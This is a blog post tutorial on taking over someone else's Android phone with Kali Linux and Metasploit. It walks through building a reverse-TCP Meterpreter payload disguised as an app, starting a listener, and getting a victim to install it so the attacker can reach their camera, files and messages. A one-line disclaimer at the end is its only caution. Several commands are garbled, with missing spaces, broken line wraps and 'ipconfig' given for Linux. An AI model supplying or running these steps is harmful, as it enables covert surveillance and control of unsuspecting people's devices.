Blog Archive

Friday, April 22, 2016

How To Hack Any Device With Kali Linux

This tutorial is exclusively for all those who want to hack android phone.The method explained here is a MetaSploit method which will give you control over victims mobile phone .You will be able to access and control victims camera,file manager, Bluetooth, Messages and many more.

android-robot-peek.png

In this tutorial i will be using Kali Linux to hack android Phone!

Just Follow the below steps to hack android Phone:

1) Open Terminal and type:

ipconfig

Untitled-19.png

To Check your IP address.Here my ip is 192.168.43.203 , which is alsothe attackers(my) ip address

Untitled-21.png

2) Now i will be creating a dummy android app that i will sent to the victim.For that just type :

msfpayloadandroid/
meterpreter/reverse_tcp
LHOST=attacker_ip_address
LPORT=port_to_receive_
connectionR>
Appname.apk


Attacker_ip_address= your ip address that you found out using ipconfigport_to_receive_connection= 81

Untitled-32.png

3) Now while waiting open up new terminal and type

msfconsole
to run the metasploit.

4) Now type

usemulti/handler

Untitled-42.png

5) Now you have to type:

setpayloadandroid/
meterpreter/reverse_tcp


and then type

setLHOST<
Attacker_ip_address>


and then

setLPORT=81

Untitled-52.png

Untitled-62.png

6) Now send the dummy app to the victim..upload it to net or try any other method.

7) Once the victim install the application and runs it ,you will start seeing a session.

Untitled-71.png

8) That’s it we are in the victims android phone and can whatever we want.Just type help inorder to get the list of commands!

DON'T USE IT TO HARM ANYONE OR ANY ILLEGAL PURPOSES I'M NOT RESPONSIBLE FOR THAT

No comments:

Post a Comment